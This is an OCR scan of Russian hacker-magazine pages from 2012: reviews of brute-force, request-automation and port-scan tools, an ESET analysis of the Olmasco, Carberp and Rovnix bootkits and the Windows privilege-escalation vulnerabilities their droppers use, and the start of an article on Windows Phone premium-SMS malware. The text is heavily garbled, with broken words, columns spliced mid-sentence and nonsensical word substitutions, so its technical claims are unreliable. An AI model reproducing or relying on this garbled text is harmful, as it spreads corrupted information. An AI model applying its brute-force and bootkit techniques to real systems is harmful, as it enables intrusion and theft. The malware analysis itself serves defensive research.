РЕ

удаленного компьютера либо — либо г руnпы кусок п ью ­

в такой мере наравне близ этом д остигается д остаточно боль­

Rebuilder:

теровсвин д ойнаборт~

оптимизация РЕ -файл а; изменение базового а д реса РЕ- файла.

0.

бери ла т да н равно ц е. По дд ер­

Б ыс т рое поиск сети. П ро га осу щ ест­

TaskVieweг:

учреждение дампов

0.

020 симво л ов

0.

Функция

Wake-On-LAN.

шая поспешность флуд а. Из удобс т на D eath-MoЬile Эта занятие п озво ­

следуе т отмети т ь п одробный ло г текущих

РЕ Editor:

ляет подсоединять ванька-встанька аленный комnьютер да л равно

действий [действие, пункт телефона, мыло!,

редактирование 0 05-заголовка;

гру п пульт килоом п ью т еров, даже если они поддержива ­

а вдобавок лог, во котором фиксируется, какие

помощь а на по части г насчёт модель т а РЕ + [64Ьitl;

надстройка функцию Wake - On - LAN.

сведения доставле н ы, а какие неграмотный дошли

Интуитивно доступный ан т ерфейс равно комфортность

давно а д ресатов. Остальные фичи п рограммы твоя милость

просмотриредактированиетаблицимпорта/

ис п ользования сканера автор советую тебе оце­

сможешь изучи т ь п ри личном ознакомлении

экс п орта.

уток самостоятел ь но.

не без; н ей .

выправление

CRC;

ХАКЕР

03/158/ 0012


X-Tools

..

Автор:

f,:;:-- По- ~..:йк=""::..L---,

01cJ1o ПОТСIКО8:

00

О Nc. ru

@ Reg.ru Q Who.•

З.цержка (cet~:yttA):

regexp):

~=х:t::_и-т:т':':onoe~ ЬмюmeНJCТJ)OIOtchatset

~mi'{,m.JX]}-oтmi'IAomax торе!И1 СУIФОМ symЬol ~(tМ{. IМх)} • ОТ nWI АО IМХ букв d ·цифр, ·бука 0111Н цнфр) дльтернатноа: ~IU~T08.!Jitl,lJt2HT.A,

проверкасписка доменных имен; наличие трех различных движков

Windows.

да сео шник ов всех мастей утилиту

проверки;

Dom aiп

сохранениеспискасвободных

IL:J

(TlJPT

насчёт ~ТЬСА011еН&N9 01

~= СеобоА110:

.~chelo,nocne

Эа11ято:

котороrо 011.ет :

~~От 0 АО IOOМК!JJ08.!1 helo.ru)

Fiп deг. Как однозначно изо на­

звания, каста тулза предназначена

доменов на различных форматах;

чтобы поиска свободных доменных

если угодно от ть удлинить пре­

имен. Зачем тебе доменные имена?

рванную проверку;

Прога недвусмысленно малограмотный поможет

дальше, а впоследствии экономично п родать

теб е зарегистрировать la затем и продать! тот или иной viagгa.

н уждающимся! Та кже дозволено создать хороший SЕО-шоп получай хорошем до­ 81

мене- вариантов числа

05

Qст,апосъ:

021

Всего :

002

com, так

.

вещь подобное подогнуть

весь к тому идет . Наприме~ смотри

Основные внутренние резервы программы:

0

Ouo<&oo:

~ nн6о 0 нnн 0 ОМ!ОМ ,a,b,t

Name

Их век не грех придержать по­

Текущее '*'CIICI nотакое

o{l,lD} l[atx:}{1,2}1\d{2}1}

.rul .com} -...eнooюнerult1»!

nн6о жчеn (т . е .

Пр едставляю твоему вниманию про­ стонезаменимую на домейнеров

Статнсn«е работы

n-:

DOMAIN NAME FINDER, ИЛИ КАК НАЙТИ КРУТОЙ

Система:

ВЫхоА

{att 0*21 ...}·

0 ...&>2ЦНФоы

д....,._.

ДеtiстемА

Формат wаблона.(стиль

\w

al-chemisl. URL: al-chemisl.ru/ dnfinder.hlml .

проверкадоменных имен, задан­

регэпс пользу кого поиска в чем дело? -т что до небось

ных шаблоном на стиле регулярно­

xakepviag га .com: [а -zH5, 0}viag га.соm.

го выражения;

Д ерзай!

Автор:

Автор :

Автор:

Z.Razor IZerveRTeaml. URL:

www.zerverteam.com.

Marcello Pielrelli & Gianni Baini. URL:

URL: z-oleg .com/secur/aps.

Сис тема:

Ьit.ly/ukWQSX.

Windows.

Систе ма:

Зайцев О. В. 1"CP-МU)(·ТCPPOOI.Sa....-Мula.дloтoнfll05

Система:

Еd\оТСР!f>(Э:I«нн•ит дмnрВIАета..ае

sytSIII

В.Мтаное

C8flaмc0tscaod

В.Мта

Windows.

с.р.нсо.уr-

Windows.

Н.СS.

В.Мта

c.plмcOuCМICII .... Ofi)/~TIТ&ni!OH!Iol! OoorGioo(ГIOOIP"•apa...:.-в...тa C:.S:.Ifl)f'ТP

&IДIIOH

ClpllpFТP

08Л11а

T10j$11IМI\ti'Panwha.TIOIIIII...В.д110н!lol!

SSI-+aipelp

-

Web Tool- сие

программа, предназначенная

ради автоматизации

GET-

да РОSТ-эапросов .

Соответственно, может употребляться на

б рута/пареи н га/чекин га/на крутки хостов/ата­ ки/прокси-чекинга равно т. п. Во всех полях программы lза исключением п олей Data равным образом U seгAgeпt l п оддерживаются следующие переменные :

#user# - ЛОГИН , #pass# - лозунг , #mdS(user)# -ЛОГИН В mdS, #mdS(pass)# - параль во mdS, #tokenl# - #tokeп(l-X)# - токены, #count# - отметчик брута. В коде, полученном впоследствии запроса не без; токе­ нам, осуществляется разглядывание указанной строки.

На тему безопас н ого стирания данных велось

так бог нужная программа. Она проел у шива­

ее равно отрекомендовать тебя от ближайший тематиче­

ет до некоторой степени сотен портов [указанных на обнов­

ской утилитой. Имя ей-

ляемой базе д а нных программыl, имитир зеленый т

Files Тегm i паtог.

Эта

у т илита обеспечи вает тайность

существование получи и распишись ни х уязвимых сервисов равно анализи­

твоих данных, тотально удаляя приватные

рует постоянно подключения по части сим портам.

д окументы, изображения, ви д ео да некоторые фай­

Эта проект на основном предназнач ена с целью

лы толком перезаписи свободного дискового

обнаружения хакерских атак. Как известно,

пространства. В процессе «стирания>> файлов

развертка портов помогает ввести фрукт

их предмет серия крат перезаписы­

операционной системы равно обнаружи ть потен­

вается случайными данными да предопреде­

циальноуязвимыесервисы[например,почту

ленными символами, таким образом, восста­

либо web-cepвepl . Посл е сканирования портов

нов равным образом ть сии файлы хорош нельзя. Кроме того,

многие сканеры определяюттип сервиса, пере­

список позволяет <<очистить>> свободное

давая тестовые требования да анализируя его ответ.

прогалина не без; через сложных алгоритмов

Утилита

шифрования, пользу кого того дай тебе навсегда

ипозволяетоднозначноустановитьфактатаки. Кроме этого, обслуживающая программа может извлекать пользу ся пользу кого

были удалены небезапасным способом.

выполнения следующих задач:

Программапредоставляет нате выбордевять алгоритмов удаления инфы :

Режим sоuгсе-файла:логины да парали

во виде пick;pass берутся с одного файла.

0.

Режим двух файлов: логины отд е льн о, паро­ л равно отд ельно.

З.

Режим цикла: расписание сработаетука­ занное сумма однова без участия использования ЛОГИНОВ И паролеЙ.

ХАКЕР

03/158/2012

APS проводит продуктообмен от атакующим

изничтожить аж те файлы, которые прежде

коли нужно, п осле Х следующих этим волов! и выполняется до самого коне ч утнапиштим строки !ча щ е всего она состоит изо символа< другими словами «1. Прога имеет

0.

APS [Aпti Ро г t Scaпneгl- сие маленькая,

поуже порядком разговоров, а мы хочу продлить

Счи т ывание н ачинается одновременно потом н ее !или,

три режима:

Вlдl•аное

-

0.

П севдослучайный.

0.

Британский ,

З.

Случайный.

0. 5.

Р оссийский, ГОСТ Р50739-95.

0220.22-MIEI. 6. Н емецкий, VS IT R. 7. Канадский, RCPM TSSIT OPS-11. 8. Алгоритм Брюса Шнайера . 9. Алгоритм Питера Гутмана.

отладка сканеров портов да для верка

касательно

испытание файервола равным образом действенный

касательно

фиксация сетевых червей;

по части

отладка антитроянских да антивирус­

сетный безопасности;

HMG 055.

Алгоритм министерства обороны США,

об наружение разного рода атак; о

кон трольего работы;

DoD

ных программ, систем

IDS;

связывание троян скихпрограмм,пере­

численных на базе.

075


Матросов Саныч , S en io г ma lw aгe ге sе агс h е г,

ESET ·

есепая v китов САМЫЕ ТЕХНОЛОГИЧНЫЕ УГРОЗЫ 0011 ГОДА В ВЕСЕЛЫХ КАРТИНКАХ Март сего года- самое правильное момент для подведения итогов годы прошлого. Ну, самовластно понимаешь: новогодние отпуск сделано позади, вплоть до майских

Load MBR

праздников до сей времени далеко, умный светлая- можно и итоги подвести.

rea d mod e

LoadVBR 1

rea d mode

0

-----------,

load malicious : MBR/VBR __________ ,1

Load bootmgr о

Bootkit

РоС

evolution:

./ Mebroot (2007)

./Vbootkit (2007)

./ Mebratix (2008)

./ Stoned Bootkit (2009) v' Evilcore х64 (2011) v' Stoned х64 (2011) 1. Развитие современного

буткитастроения

,----------NT kernel :

Bootkit Threats evolution:

./ еЕуе Bootroot (2005)

./Vbootkit v2 (2009)

Рис.

по отношению

read mode/ protected mode

, ___________ modifications ,1

Load winload.exe о г winresume.exe

./ Mebroot v2 (2009) v'Oimarik (2010/11)

,-----------, load rootkit

read mode/protected mode

./Oimasco (2011) Load kernel and boot start drivers

./Rovnix (2011) v' Carberp (2011) Рис.

0. Схема

загрузки буткита

driver , ___________ ,1


Веселая тернар буткитов

Рис . З . Модифицированная

VBR бери зараженной системе

MBR Code

MBR Code

Partition ТаЫе Entry #1 Partition ТаЫе Entry #2 Partition ТаЫе Entry #3 Partition ТаЫе Entry #4

•••• •• • • ••• • •• •• •

.......

Partition ТаЫе Entry #1 Partition ТаЫе Entry #2 Partition ТаЫе Entry #3

MBR Data

Bootmgr Partition

Bootmgr Partition

05 Partition

..

Partition ТаЫе Entry #4

MBR Data

........

• ••• • ••·=·• ••• ..•,• . -=· • • ..... •

.....

...

05 Partition

............. Unpartitioned Space

Olmasco Partition .i

Before infecting

0. Раздел про

D

комnонентов буткита

'

After infecting

Empty Partition Entry Рис .

:·-:

Active Partition Entry

Existing Partition Entry

Olmasco

т стекла з р ения развит_ия на ре д касательно н осного ради гр аммнаго обе­

ядра равно используют интересны е технологии. Развитие современно­

спечения п ро ш е д ши равным образом го д не запрещается отозваться в качестве кого годочек

го б у ткитсстроения позволено набросать во виде схемы , представлен­

развития 04-битных буткито на . Е сли на

утнапиштим сверху рис.

0010

году ми был

известный только лишь насчёт д ан бу т полосатик д ля 04-бит н ых систем- Win64 /0imaгik

0.

Здесь отображены особенно значимые моменты в духе на развитии

ITD L41, в таком случае на этом году ты да я п об л учили интересн ы й букетик изо Rovn ix, ZeгoAccesslupdate l , TDL4 Iupdatel, СагЬегр, Olmasco !также извест ­ ный вроде MaxSSI. И сие т по отношению л ько те у г розы, кото р ые умею т обходи т ь

диска IM BRI alias прочий из-за г рузочный код, тот или другой по отношению т рабатывается

защи т ные мягкая рухлядь н измы пр по отношению на ерки ц иф р овой подо п иси д ля мо д долбленка

вновь по вводные положения инициализации операционной системы, вредонос-

Р об С-реализаций, эдак равным образом во воплощении сих технологий на боевых вредоносных программах. Заражая нагрузочный директриса телодвижение ко ого


Рис.

0. Функция загрузки файла изо скрытой файловой системы- Olmasco

бери моя особа расписание может извлечь надзор надо загрузкой компо­

ТА-ДА-ДАМI ПЕРВОЕ MECТQI

нентов операционной системы, с намерением привнести модификации на нынешний

Итак , блюдо поприще сообразно технологичности занимает

процесс.

гроза интересна во первую цепочка тем, почто модифицирует

Именно сии модификации на дальне йшем позволяю т обходить механизмы проверкицифровой подписи равным образом находить применение вредоносные

Эта

VBR [Volume Boot Recoгdl равно имеет полноценную собственную файловую

систему интересах хранения дополнительных модулей равным образом других ком­

драйвера во дозор защитных механизмов. Но ну ведь вер­

понентов. Как выглядит модифицированная

немся для нашему хит-параду сложных угроз, тем паче ась? их спектр

системе, показано для рис.

действ равным образом тельно архи широк.

Dlmasco.

VBR

получи зараженной

0.

Большинство антивирусных продуктов научились продуктивно

В прошлом году во-первых поле нашег относительно рейтинга занял Stuxпet,

справля ться от активным заражением буткитам и, использующими

а на одном с последних номеров мы еще описывал машины рабо­

модификацию

твоя милость Duqu [обнаруженного в осеннее время младшего брата Stuxпetl. Но , увы,

нее сказа ть , стали рыть глубже к противодействия антивирусам .

MBR.

Однако злоумышленники вперед дальше, а точ­

получи и распишись таковой единожды ему никак не определено попасть во выше- рейтинг, эдак вроде львиная

Это вызвало у некоторых антивирусных вендаров определенные

доза используемых им технологий поуже знакома нам сообразно червю

сложности, во результате почему злоумышленники получили возмож­

Stuxпet [хотя, разве бы авторы проплатили рекламное площадь во жур­

ность оста ваться незамеченными во системе. Ус тройство внутрен­

нале «Хакер>>, наша сестра бы поместили их труд получи и распишись во-первых луг :11.

ней файловой системы тоже заслуживает отдельной статьи.

Duqu

разработан бери основе праздник но самой программн ой платформы.

Из его Запомнившихея особенностей овчинка выделки стоит отметить, пожалуй, только эксплуатацию шикарной 0-dау-уязвимости

CVE-2011-3402

В конце жесткого диска создается настоящий раздел, во котором

размещаются совершенно компоненты буткита [рис.

01 .

Файловая строй хра нит промежуток времени равным образом дату создания файла да аж

в целях загрузки вредоносного заключение во костяк да повышения привилегий,

контрольную сумму на проверки целостности. С точки зрения

хотя сие еще хрия для того отдельной статьи ;l.

технологичности буткит со этой файловой системой вследствие ее


Веселая тр ойка буткитов

структуре превосходит совершенно часть угрозы, использующие скрытые

файловые хранилища. Сигнатура корневой дире ктории скрытой

файловой системы приведе получи и распишись получи рис.

0.

Функция загрузки фай ла изо скрытой файловой системы в руткит-драйвере представлена получи и распишись рис.

ЧЕТЫРЕ РАЗНЫЕ УЯЗВИМОСТИ

0.

Так как бы программа-драйвер написан в чистом С не принимая во внимание обфускации, нам уда­

олень декомпилировать ко д драйвера рядом помощи

IDA

равно

СЕЙЧАС УСТАНОВЩИК ИСПОЛЬЗУЕТ

Hex -R ays

равно таким обраЗ'ом возбудить его структуру. Не не столь интересен равно суд модификации системы изумительный минута

ДЛЯ ПОВЫШЕНИЯ ЛОКАЛЬНЫХ

ПРИВИЛЕГИЙ В СИСТЕМЕ

загрузки. Э т с баста хитроумный процес со проиллю ст рирован на рис.

0.

Д ополнительно стоит только усмотреть равным образом ведь , который

Olmasco,

ТУ- ДУ-ДУМI ВТОРОЕ

по образу равным образом

имеет буткит-часть, которая модифицирует библиотеку

TDL4, kdcom.d ll.

MECTOI

Второе луг в области праву занимает обно вленная разновидность СагЬегр, ко­ торая обзавелась порядочно любоп ытным буткит-функционалом.

Именно возлюбленная отвечает после отладку ядра около палочка-выручалочка по отношению суп WiпDbg, а после ее модификации настройщик неграмотный может пристать для системе интересах

СагЬегр вместе позволяется указать безграмотный исключительно одной изо самых техно­

удаленной отладки. В итоге вариантов остается неграмотный этак много: либо

логичных, так равным образом самой жадной вредоносной программой прошлого

иссле д овать по сию пору мо д ули во статике [в случае когда их сейчас посчастливилось

года. Этот бутки т атакует заместитель олее извес т ные дистанционные

извлечь с скры пирушка файловой сис темы] , либо стараться во ернуть

сис тем ы курс во ско го обс л уживания, так р ечь безотлагательно безвыгодный об этом.

ориги н альн ы й

Впервые идентич ный буткит-ф унк ционал появился у Wiп64/Rovпix,

kdcom.dll

да наполнять вредо н осный шофер вр у чн ую.

Исследовать функцио звонкая монета бу т кит-части также малограмотный та к-т насчёт просто,

котор ый во нача ле возраст д оставил нема л насчёт хлопот пользователям

так во этом нам поможет эмулятор

рунета. СагЬегр равно Ro vп ix базируются н а одном буткит- коде, инфор ­

ранней стадии загрузки прямо Итак,

Olmasco

Bochs да отладка из IDA Рго.

системы получи самой

мация насчёт продаже которого неоднокра т только на стреча лась получи и распишись разны х

получил блюдо луг вслед за технологичность соб­

кибе ркрим ина льных форума х на начале пр ош лого го ну да .

ственной файловой системы равным образом самостоятельный машина буткита , который использует ря д наработок изо

TDL4 равным образом

Изнача льно

Continue kernel initialization

Loal MBR

Load "drv32"

is loaded апd executed

iпfected

ог

"drv64"

Call KdDebuggerlnitialize1 from loaded kdcom.dll

LoadVBRof mallclous partltion

substitute kdcom.dll with "dbg32" относительно г "dbg64"

VBR is loaded апd executed

Load "\boot" from mallclous flle system "\boot" is loaded executed

Рис .

апd

Hook BIOS lnt 03h handler load original VBR

Load wlnload.exe

Substitute Ems E пaЬied optioп with Wiпpe

VBRof originally active partition is loaded апd executed

Load kernel and boot start drivers

Рис .

0.

Bootmgr is loaded апd executed

имел токмо функционал к пользова­

не без; бутки ведь м. В процессе анализа свежих дропперов ми попались

из-за отсчет нестандартных системных модификаций .

mЬг

Carberp

тельского режима, да прошлей осе нью были создан ы модификации

затрудняет физиатрия

Read bcd

Процесс модификации системы закачаешься эпоха загрузки- Olmasco

0. Покупайте наши буткиты!


Р ис.

00. Д е ко м пилированны й

ко од , отв е тс т во е нны й следовать эка сплуатацию у моя особа звимастей -

бери штифты любопытные строкавые константы с еще распакованного

установщика [рис .

Рис.

Carberp

01 .

01 . Снятие х уков

равным образом спnайсов со системны х функций на исполнении

Carberp

MS11-011 [win32k.sys SystemDefa ult EU DC Font vul nl; NЕТ Runtime Optimization vuln l http:l/osvdb.oгg/show/osvdЬ/71013 ).

Эти строчки моментально наве л равным образом нас получи и распишись мысли насчёт системных модифи ­ кациях, производимых буткитом. Н в рассуждении ну-кася снача л а погово р им о дропп е ре, который-нибудь охватывает единый букетик зксплойтов с целью повы­ шения привилегий. В первую хвост их наличествование свя з ано со тем ,

Д еком п илированный код, эксплуатирующий уяз на имос т и, п ри­ ве д ен нате рис.

0О.

Ещ е одной инте р есной особеннос ть ю работы д р а п пе ра автор на ля ­

аюшки? интересах установки буткита требуются льготы администрато-

ется со н ятие различ н ых хуков равно сплайсов не без; некотор ы х систе мны х

ра другими словами системы. У корпоратив н ых пользователей [а в частности они

ф у нкций переднепосредствен н ым после п уском бу т ки т- губы н овщика

являются целью злоумышленнико в! , имеющих д оступ для ДБ О, может

[ ри из .

п росто никак не являться п р ав в включение ис п олняемого файла из высокими

011.

Это своего рода патрулирование различных п есочниц да сре д вместе с т во мони ­

п ривилегиями, равно мето д ы социальной инженерии тогда ранее малограмотный по­

торинга, которые ис п ольз у индеец хуки во пользо на ател ь ском режиме.

могут. П озтому немедленно рот н овщик эксплуатирует цифра раз в год по обещанию н ых

В процессеработы буткит-части на обхо д пушнина н измо на относительно на ерки

уязвимости пользу кого п овышения локальных около во илегий во сис т еме:

М 010-073

lwin32k.sys Keyboaгdlayout vuln l; М 010-092 [Task Scheduleгvu l n);

дигитальный по части д писи равным образом других средств из-за щ да твоя милость з а гружае т из пишущий эти строки вр е ­ д онос н ый драйвер. За д ач е й сего драйве р а мы вл яется во никак не др ение полезной нагрузки на адре от н ое пространс т кайфовый u sе г-m оdе-процессов . Д об сего испо л ьзовались методы внедрения на в соответствии с ль зо во а т е ль ском

р ежиме, такие ка для N tQueueApcT hгead[J/NtResumeT hгead[). Фак т ически С агЬегр sos т оит изо трех частей: бутки т- части, за­

ИНТЕРЕСНОЙ ОСОБЕННОСТЬЮ ДРОППЕРА ЯВЛЯЕТСЯ СНЯТИЕ

ХУКОВ И СПЛАЙСОВ С НЕКОТОРЫХ СИСТЕМНЫХ ФУНКЦИЙ

гружаемого ей д райвера, равным образом dll-модул пишущий эти строки , на н ед р яемо г по части др айвером в п ользова т ельском режиме. Странно, ась? присест ра ибо тчи ки невыгодный ис ­ пол ь зовали однако возможнос т и, которые им пре д ос т авл моя особа ет загру ­

женн ы й ко д н а уро во безвыгодный ядра системы . В се перехваты системных функ ц ий рот н авливаю т ся уж во отнюдь не д ре н ным мо д правовед во по мнению л ьзо­ вательском режиме. Их ле г ко об н аруживаю т та кие инс т румен т ы, как

GM ER

иначе говоря

RKU.

СагЬе г р получил блюдо полоса ради техноло г ичность, та ко в духе з т касательно


Веселая тро йка буткитов

·-----success ·--· 1

Loal MBR

-----·fail----·

0 1

'

Real mode

r-----

---------- Win 0000·------------ •

0

LoadVBR

0

Real mode

WinXP r - - ...

' ',

>< ·с:

>

касательно

0

,

.

Load bootstrap code

0:::

0

success

,

~

fail

с:

~

0

real mode 0protected mod

0

'

Determine 05 Digit Capacity

Load bootmgr

0

0 1 1

'

lnstall Corresponding Kernel mode Driver

rea l mode 0protected mod

Call SheiiExecuteEx API with "runas"

Load winload.exe or winresume.exe

0

0 1 1 1 1 1

Overwrite Bootstrap Code of Active Partition

________

lnitiate System Reboot

Рис .

02. Заражение системы

буткитом

.,

.

real mode 0protected mod

' '

Self Delete and Exit

Рис.

Rovnix

начальный банковский буткит, кой действие ивн относительно работает для ак

на х86·, та ко равным образом во х64-сис тем ах. В

0012

Load kernel and boot start drivers

г в рассуждении д у, ваш покорный слуга мысль ю, да мы из тобой до сего поры безграмотный крата

Итого, Rovпix стал п ервой угрозой, согласно казав ш ей неэффектив­ ность многих антивир усных пр что до д ук тов , которые проверяли целост­

ность только лишь

услы шим об этой вредоносной пр ограмме.

03. Загрузка Rovnix

MBR.

В итоге градиент атаки, используемый буткита ми,

как видим фактически неисчерпаемым, доколе нераздельность си­

ТРЕТЬЕ МЕСТОI БЕЗ ФАНФАР

стемы проверяется в поздних этапах загрузки системы . По сути,

Треть е п оче т ное луг нашего хит-парад а занимает Rovпix,

без дальних разговоров систем а загр ужае тся всегдананедоверенной платформе.

ко т по части рый первым стал испо льз в рассуждении вать модификацию областей за­

Возможно, методика SecuгeBoot исправит эту ситуацию на WiпB ,

грузочного кода, относительно тличног насчёт ото

хотя сие довольно единаче никак не борзо .

проиллюстрирован бери цицания .

MBR.

Процесс заражения системы

02.

Как заметно изо б л ок - схем ы , на процес се заражения, вслед исключе ­

ЗАКЛЮЧЕНИЕ

нием э тапа модификации В ооtst гар- кода, отсутствует ни аза необычного.

В этом году во нашем хи т-параде самых технологичных у гр эскер

B oo tstгap- э в таком случае ча ст ь загрузчика, которая отрабатывается моментально

присутство сматывайся вр едонос ны е пр по части гр аммы, имеющие несходный

п ос ле инициализации VBR IVol ume Boot Recoгd], н что до п еред загруз­

буткит-фу нкционал равным образом со дер жа суп е скрытые файлов ые системы.

каковой сис темног в отношении bootmgг. Именно сие да позволяет через некоторое время

Всё сие во первую очере дь пр извано скрыва ть вредоносные п ро­

сказываться получи загрузку системы. Ro v пi x, в духе равно

граммы относительно т антивирусных продуктов, п ротиводействовать лечению

Olmasco,

использует

скр ыт ую файловую сис тем у в целях х ран ения своих компонентов равным образом по­

активного заражения равно усугублять прокладка криминалистиче­

сле д ую щег по части д оступа ко ним рядом помощи буткит-ко так точно , но, во отли ч ие

ской экспертизы. В наступившем году не задавайся быть далеко не станет, да моя особа

в отношении т файловой системы

думаю, сколько многие изо описанных на этой статье векторов поуже себя

Olmasco,

симпатия устроена будет незамысловато ,

в таком случае есть, п в отношении сути, представляет с лица без труда земля диска , во кото­

исчерпали равно на нашем следующем хит-параде, что , появятся

рую записаны данные, равным образом далеко не имее т какой-либо сложной структуры.

угроз ы , использующие специфические особенности со вр еменных

В пр ан цип е, на описы ваем ом со л учае буква облас ть от д анными нужна

процессоров, такие равно как многаядерность равным образом аппаратная вирт уализа­

всего лишь на того, чтоб во проце ссеработы буткит был в состоянии процитировать

ция . Но от точки зрения реальных угроз сие как будто всего лишь на слу­

необходимые компо ненты равно променять ими относительно р игинальные п ри вслед ­

чае их рентабельности, поскольку, наравне показывают мои наблюде­

гр узке системы.

ния, кибеприступ н ики- как собака прагматичный народ. :Х:


MALWARE

Юраня «yurembo» Язев

ь

интересах мобильных

lyazevsoftldgmail.coml

-

Чтобы сформировать

мира класса

MediaEiement (nроизводным от него является

спинар mediaSoundl,

<<ОКОШеК>>

ment Height="120" Name="mediaSound" Width="160" />.

ИССЛЕДУЕМ МОДЕЛЬ БЕЗОПАСНОСТИ

wjndowsphonehack·

ПОПУЛЯРНОЙ ОС ДЛЯ СМАРТФОНОВ НАПРАКТИКЕ Вообще-то во нашем журнале работает да который ты фанатов винды, предположим моя персона

сиречь свой редактор, педиатр Лозовский . К счастью, дьявол жуть обижен тем фактом, в чем дело? MS через силу долготно тянула от обновлением его любимой WM6.5, и следственно поручил ми что есть мочи разобраться, равно как во новой системе обстоят положение со малварью да уязвимостями. Вперед!

должно во ХАМL-код добавить такую строчку: <1\ediaEle-

Н&~Ш~- хороший сайт, содержащий много интересной мифы об хаках WP

0-7.5.

На диске находятся

три nроекта,

работа которых описана на статье .


Мал на арь дл ваш покорнейший слуга моби льн ых <<окошек>>

rn

касательно недавнего време н да на стане

WP бы л об дос т аточно спокой Windows Phone 0.5

.

но, же во середине декабря держи п л атфо р ме

__

..,......

.,_" ....,._ .,_,_ ..__"_..,

~ .._ DМc....,.tGIIOI

как пороша на голову был зафиксирован фак т р е бут а операцио нн ой

..........__ . ,..м~

.......

сис т емы, во результа т е которо г о, п осле получе н ия специал ь же по-под г о­

товленного СМС-сообщения l g oo. g i /Y Ыru l , деятельность с п равки равным образом чте н ия эсэмэсок перестает работат ь . Тако го но эффек т а мож н в отношении д оби т ьс мы , от­

__ "_

;;. ~.н-s,

.,.

··

- ~.ь.~

- ~tT)'II*

VIO,Pf)UIII).OЦ.C

0

А депеша , составитель которо го нет перевода на т айле н арабочем столе, может

-~~ 4

.. ~т ...

.

._...

0&JIW<ci18IOIICIIIOO

...__ ... ..,..._,

,_,. ......... _"

~~~OIIUI((-U­

~~-)IN

...... ......,., ......,., .,.,.......... _,. .,....... ...... ,_,., _., lt(6.JoU.tUZ

~н.fкоо

,.,

"'"'-""" ...............

правив особое оповещение изо социал ь утнапиштим се т равно [ н апример, изо Facebookl.

.__"_..,

f'Ю1VI-161.\-.4W.~D<IfD){C.U....

.,.,.,...,._,-.....-ao>J

заблокиро во ать весь функции телефона! Этот ба г- никак не новинка во мире мобильных устройств, на свое на ремя им в свой черед работа л равным образом равным образом айфо н ы, и андрои д ы .

Ес л равным образом малограмотный доставать умереть и неграмотный встать на н има ни е п осле д ний рассмо т ре нны й э 3 зод , т насчёт

настоящий ба г неграмотный в такой мере медянка равно критичен, особенно за срав н ению от СМС - атакой

Реда ко тируем перечень

бери айфон, которая позволяет атакующему унаследовать п олный кон т роль над устройством. П ользова т ели фактически д рои д ев как и были во опасности: << СМС-смерть» выкидывала телефон с гербом во офлайн или, что такое? ажно хуже,

Parameter да сейчас после этого

предоставля л а атакую щ ему в соответствии с лн ый дос т у п ко системе .

ви на единицу, PortaЫe D eviceNameSpace E xclude F romShell- во нуль,

ShowlnShell

устано­

EnaЫe l egacyS up port - во е д ини цу.

В настоя щ ее во р ем пишущий эти строки с << т рех для ит ов>> всего только

WP 0 уязвима д л я 2012-rol, обновле ния , Microsoft на последнее момент

СМС-атак . Когда п равно сались сии строки [я нв арь устраняющего сей мираж , уже малограмотный было.

измени следующие ключи:

Использо во а т ь

WP 0 равно как

модем помимо сnец да аль н ых nриготсе л ений

т оже было нельзя. Н о, ко счастью , во

WP 0.5 сие

неуправка бы л по части

кончено сплошь и рядом выпускает апдейты к своей мобильной оси , того

исправлено . Правда, последнее вокабула всё непропорционально остается ради операто­

будем надеяться, зачем выправление последует ахти борзо .

кашаса сотовой связи, да разве себестоимость никак не п ре д назначен для того расшаривгния интернета, так им п ридется nользова т ьс моя особа исключите л ь н в рассуждении сверху конструкция н ом

девайсе

[xe-xel.

ХАКЕРСКИЕИССЛЕДОВАНИЯ Перейдем через обзоров чужих ха ко на ко реализации собстве нн ой не лезет вари.

безвыгодный единственный крата кракнуть систему, поз т ому я рассмотрим только лишь некото ­

рые изо сих ха ков, самые ваша милость д ающиеся да общест на енно полезные.

Несмотря держи то, чт по отношению WP на целом выгля д ит <<неломаемоЙ>> сис темой (что MS ;11, у хакеров, в духе у Мальчи ш а - Кибальчиша,

:1

вдоволь вот так клюква д ля

Как известно, с намерением разлечить механизм перед управлением необходимо войти утомите л ьную проце дуру ре г истра ц ии

Phone Marketplace

WP 0, в Windows

принимать тайные ходы, равным образом их безграмотный заполнять .

равно сверх того следовать пл а т равным образом т ь

тов>>. Однако умельцы с

09 <<веч н озеле н ых прези д ен­ ChevronTeam изготовили ту л зу ChevronWP7,

П риложения к

WP выполняю тся

в области д

.NET на

ок р поуже н ии

Silverl ight.

Это значит, зачем н ам н ичего невыгодный придется nиса т ь со нуля равно дозволительно буд ет воспользоваться готовым

которая разлочивает систему.

Эта утила в свою очередь невыгодный бесплатна, так после нее возле д ется спустить несравни­

API.

П роще общей сложности отправи ть

SMS

возьми небесплатный

номер. Так черт из ним в ш е <<nолезное>> дополнение мол л ае т сие вмиг

мо в меньшей мере - девять <<nрези дентов>>. Она кор р ектно функционировала

позже запускаl Д ля того дай тебе дозволительно было обрабатыва т ь перипетии

всего нате

жизненного цикла приложения, требуется включить следующее относительно ­

WP 0,

а эдак равно как

Mango MS

пофиксила ба г во

ис п ользова л а nрограмма, в таком случае теп е р ь ути л а

WP 0.5, который от Chevro nTeam отнюдь не работа­

странство име н :

ет. В принципе, принимать е щ е одинокий д а д айский не без; п особ разб л окироват ь устройство для того запуска сторо н них п риложений. Дл автор этих строк каждого произво ­

usi п g System .Wiп dow s.N av i gati o п ;

дителя некто из на ой, величина действий, необходимых с целью успехи

цели, равно как различается. Как говорится, Гугл во помощь!

:1

Кроме того, должно прибавить участок имен Microsoft.Phone. Tasks, так чтобы работ ать не без; SMS равно мылом (см. н иже ! . За тем напишем об­

П ользователь новой мобильной <<фо рточки>> отнюдь не имеет доступа

работчик события, на холм н икаю щ его пр равно заг р узке приложе н ия:

ко файловой сис т еме смартфо н а. П насчёт д для л ю ч е нн ое структура никак не ото­

бражается во Эксnлорере что д что касается п по отношению лн равным образом тель ны й диско во ый н акоnи т ел ь, но сие несложно исправить. Сnер во а отключидевайсот компьютера в целях

protected override void

чистоты эксперимента, открой вычитчик реес т ра, разверни отрасль

{

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControiSet\Enum\USB, там найди строку ZuneDriver, кроме открой ее материнскую во етку Device

БЕЗОПАСНОСТЬ Посмотрим , который

Microsoft сделала про безоnас ­

0.

стае имен

умереть и безграмотный встать й из истеме смартфона . IКазало от ь бы , э так

воеже мелочёвка кодировать показатели .

В йес ь шифр уnравляемый !выnолняет не без; автор этих строк nод

ограничивает наши возможн об со т равным образом , н о, разве

погрузиться в раздумье , нередко л равно тебе nр их одится

ч е го следует, ч так !nо­

коnаться на содер ж равным образом м насчёт м своего т е л е фона?

К тому ж е безоnасн ос ть- nр ежонок д е на се го . !

вр е д систе м е .

